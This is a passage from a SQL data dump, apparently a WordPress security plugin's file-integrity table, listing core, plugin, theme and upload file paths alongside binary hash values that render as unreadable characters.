��������_S�','',0,'?'),('���-�$�مA�\Z','wp-content/plugins/wordpress-seo/languages/wordpress-seo-da_DK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�A�~�����!�?','��%:�Ae\\�2��y���$�\\�sf\Z','',0,'?'),('���-y�æl�&Jk�V','wp-content/plugins/wordpress-seo/js/dist/externals/jed-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zfj~�r��op\Z�f','��G��E��w�\Z~�Þk���\\�#\'�','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ws���H��j����','���&�TK��;�$(�ᢡOg�p�m]��','',0,'?'),('�]�8H4b�Me@','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-twitter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����m&\rt�, ;��f','4�V��*�ǎ���GxIcj�\r~�B�\Z:�>ٴD','',0,'?'),('� ����AR�Z\Z��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�+qi-|�-+�)','HZ<�l`EL{�?z�q\n���#lQa��N*','',0,'?'),('��xl��j���KK�H','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-article.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0^�h�z�}���S�n7\0','\Zl��B�S�H�yk�(�i�$�%&8>Ϣ|�[Zo','',0,'?'),('�5�x=�KD���W','wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���Di ��','��չ�c�.��\r8Dם3i�\n��li�Z��','',0,'?'),('�:�y�[��_�:6��?','wp-content/uploads/2019/09/garden.jpg',0,'��eM��jw\Z2���+�','��eM��jw\Z2���+�','ޅ��;C����)��/d�=ۓ��*W��','',0,'?'),('�<�8�;p� x�TG','wp-includes/css/dist/edit-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?G^\Zg��ƍ@5 sC','(���\ndpJ�r(nz�ck4]�i��&��%�m','',0,'?'),('�IѠ�<83�����','wp-content/uploads/2021/08/building-768815_1920-150x150.jpg',0,'K^>���=�(j��^Ϸ','K^>���=�(j��^Ϸ','�Ȕ���k\'\"��s�M��4M�tٖc�P��v��','',0,'?'),('�Q|�O\\��iqʼnu0','wp-content/plugins/redirection/api/api-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��Y�|�r���L�','�+�0:� ����+G���Vb+�o]','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z� r!ޏf��� �','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�eƙ��}ǜMWԻ-��','wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�މ�I_����Pr�Y�','X��WJ�ת�oD�9C�40�7P�a Q','',0,'?'),('�j���#�Ӳ��X%�I','wp-includes/block-supports/elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2�(�xXJ5&�','�9�*�9?bzN�#>�#�u|�P5\0Љ:�G�\0','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s `�A���;�y_���<��X�\Z�%Y�','',0,'?'),('��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~���4��','',0,'?'),('֮�mN�GA�s��.','wp-content/plugins/wordpress-seo/src/generators/schema/organization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\"��q��ӷb�Uc',')A�}��]�k��s.��[�#LI��Q�:w��v','',0,'?'),('ֳ��ү�$�OO�%��','wp-content/uploads/2019/12/pexels-photo-164005-768x511.jpeg',0,'�G��5g�ܮ1���','�G��5g�ܮ1���','�� |:�� wZc�tY�_�2��lZFJj�\'','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('ֽ�B��m�O�*�:q�z','wp-content/plugins/wordpress-seo/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','),��c���7���K�','���W 8W��\\��m4�uS�{��|�Л0x��Z','',0,'?'),('��=��,9\"Y;}�X','wp-content/uploads/2016/11/kitchen-2165756_960_720-300x198.jpg',0,'�\rD�B$,5�;I�k�T','�\rD�B$,5�;I�k�T','yÓ�贌�!FI�}X�0h3.�lN����)\Z�','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���-[�\0:�&��','',0,'?'),('���B��W���k\rZ{��','wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5\\S���z���','�\0h���=�`]U3�g��殼4%1��9x�*�','',0,'?'),('�ߢ\Z�s>����\'�','wp-content/plugins/redirection/locale/redirection-es_VE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����A��A��yf','j(PƑb���^����F����<�:?��','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-� %�7��5[�1�+i�uG�','',0,'?'),('�%�u�c�p֖��]�','wp-includes/blocks/calendar/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('�(T-Rb�b','wp-content/uploads/2019/08/Massages-300x250.jpg',0,'E�͡�V`{�9�\r�','E�͡�V`{�9�\r�','�M ��)�Sg�,�?�;Sh>QzS���P-�O','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��ZZ\0dPei8','ޥ%���z�g�,!o�>]��t��j�yY̎�R�','',0,'?'),('�I� J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ţ�{��LlF��','�ۖ-<��ύ�C\"�(���Q���,Hn�C�\\8��','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W�� �)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�X�J�K�3��F~�','wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kch��κmG��Oc','kz�`��&`�+�\rƈ�$F��5Ė[|n�','',0,'?'),('�a����E��{B)p��','wp-content/themes/vega/sample/images/featured-image-6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S0�=A�0�E�6�T','TՉV��-�kuOJm;\0����è��=QW_�','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k���r��1��','B��y<�٢S�]��AnX�{���B�#�I�','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�v\"6�`�vy�H����','wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX���E�%�E�E�',',��;Q��]�:ŭ��\r{#~�㯎�i\\$�� ','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�w��L��<qoj��|�','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tb1M�w��W�4�[?','I\n���4sD����|��x�y��pe�M̀��M','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-:�(��%�O�\n�~','x�(����˻������Y}hu^8?K���Z','',0,'?'),('ש���c�#�|���','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�7�S�!�-j���','�4^��C]��3��&���k��{T��rYj;','',0,'?'),('� �1B�}����','wp-content/plugins/wordpress-seo/css/dist/featured-image-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�.� N�|8��b��','�Ī+4c�]�F�� �v�+��D��E&','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('���:<vmK��j5C','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-post-type-visibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��!^�zq]H[�','����8Mݹ�̭c��\rD��E+��ܩ��E�','',0,'?'),('�⯹��S�)�w.�\"A','wp-content/plugins/wordfence/js/wfpopover.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('���M����R�N�a �','wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԅ����Gy�$���&','��\\�S/�3��)nb��pz�춲2?Tƕ�4','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{G��(�땤h��','z��Х��Y���\'R�H�y��Ri�V~��\nȿy�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�!pKL��wG&25� ','wp-content/plugins/wordpress-seo/js/dist/languages/he-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofS���\Z|6�\0�','���{�V�|�8Rx�GUЪ�r+���;','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^ �σ�7�2��7�{','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�[%���X���<��r','wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�!Wp���Ωo','�zT�j<��1tk0F3D-�̾~4�b��;N,\'�','',0,'?'),('�o�ǣ� ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A �<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؑd�r?.����G�u�','wp-content/plugins/wordpress-seo/js/dist/term-edit-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\n�H.[�JD���','�bW�ټC�fM�S�7��(���%�~\"+��','',0,'?'),('ؒ��K��R ��Ȥ','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֧��F-\n�nYK���','MB@�fp ��TQ�L�]\"��6ڨ�֜S','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;YҮ|=�q\r�R.;\'','�@밋�k�`]�gsy�j����h��2�g[9','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��=)8�{�\0Z�g(�{�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/BadResponseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��\Z��V!��BG��5','n)�,�Ϭ�\0Ͳo�p� dop� Zܯ��\\��','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!��N�J�A��v','T��II-�U{z�]m��RX��>�@[jt�X','',0,'?'),('��`?u�w�\'q]y','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��>��@��','��˵��4UǴ��t&�l$!�\\�#G�eOq�q','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-̘�sU�����{�','\n4�6�K��(�z��U<���o�����A�p5','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��vؖ��W.mc��','�h���\\���|UW�����5h��g����','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���fq��(��>�yY=�','�n��T�a �X��Z�:3o��ƈK.�)','',0,'?'),('�(]���H,ú��\"c','wp-content/plugins/redirection/models/log/log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-q�t��8˵�2�6','���wh�U9\"�rWm�� ���&���\0�I�','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�O\'�\'�C�����','wp-content/plugins/wordpress-seo/src/config/migrations/20200702141921_CreateIndexableSubpagesIndex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�D�ḯ:�%�C���s','�WWgn.&p���&\n�o�0����G�HI','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m� �yR����','�ID��<�k�N�Ә�\r��ں������r~','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�jQc:�1NiD','�k�G寲�\nCD#�6�u\Z�քEڣ@K1','',0,'?'),('�n1��q�<gމ�|�W','wp-content/uploads/2019/09/garden-waste-768x511.jpg',0,'mAw3�t�r �{.y','mAw3�t�r �{.y','*�G��\\L8�ED N����\0�\rL&��m)��','',0,'?'),('�r&V`�\r��䑽��C','wp-content/plugins/wordpress-seo/src/builders/indexable-link-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��`p��{�O\r��','5�\09g���3�Q�Hm���/i�bƦ���2�?','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\\���u9�w�肂�`9','����:A�|\\hx��k�}-�If{��S�-Q�v��','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٱ��MPr��h~���','wp-includes/blocks/post-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dD�J��2��=�i�','-P��] 6��?��rW�ߺaV����','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�K��TS\Z5�5��','�~}���۽@֖\"�����Jf4�*Ww븺','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L �L�M�ʫ�)�','',0,'?'),('��>t�ȱ�Ƿq �D�','wp-content/uploads/2019/08/thai-property-150x150.jpg',0,'�{f;�T%A�h��p','�{f;�T%A�h��p','TS�0��+�v�GX�6���:���z^:b+��C�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v\0���\r����:c��GO���','',0,'?'),('��<�G+&3�9�l','wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��V?�g9ok5�','��M�Zт�\0�e~?1��ss� �xx#OX','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�$�A��qE�CO�\'','wp-content/languages/plugins/redirection-en_GB.po',0,'BY[�BB����8/,��`','BY[�BB����8/,��`','��aR�I/�(�,�8�Xs\"퀶\\7xlj\n��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('� ����� ��\n�g�','wp-content/plugins/wordpress-seo/css/dist/metabox-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��Y �wzME��_','�i.���g���ZY��#�쌿����n�|P','',0,'?'),('�\n��\r1gw��?D�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-bg_BG.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������[�7��I��','*��f�!v�0�\Z$\0�3�=9Z插���e�a','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�pF�K�E��q*��','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-he_IL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m-p�ݩ��p\rj\n','�S��9��g��RN!s�ǎ1K����MCc�Kx�','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�(�:\"\rh�$��h�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-uk.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B �8bhZ\"�<�OV�6','�5�#�a�Ax��R�@����4R�!��p1�p','',0,'?'),('�,\r�� �g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�v�������','t Nɼ!\'�W���`�1��1���1�!�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�V���C����dvۦ�','wp-includes/blocks/file/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�@�/�S��2D��','~@m .3�Q[�J��4k�-�֦�����h','',0,'?'),('�_G����7,�0','wp-content/uploads/2019/09/gardening-150x150.jpg',0,'��\n�����|QQ\nbA','��\n�����|QQ\nbA','�c��d\r���Nl�\Z���J���\r�������','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d',' N��ż �I6h�%^�?`v�Y�=��2��','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tJֶ�Dܒ�+�C','��\"uu�g�I$E���D=��\n���Q��g-�TZ','',0,'?'),('�|�#�#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��w��h�����s�[','�y�h8�Hi*\r!���4*�<9g�V\"�U��','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�qe�:\"�IРk�','pAL�.�����g���4��}�bp�mz\'h�`','',0,'?'),('ښ�������u�_�','wp-includes/blocks/post-template/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�^\Z� ��x�iK^8��','@fLC\r 5?[Y~�K�����^3aҭf��%�','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('ڰ�n+?G���9o���v','wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-install-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Bm�sb��`V���',' ���$Q���.MWT����W2ձ���{w>','',0,'?'),('��#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z 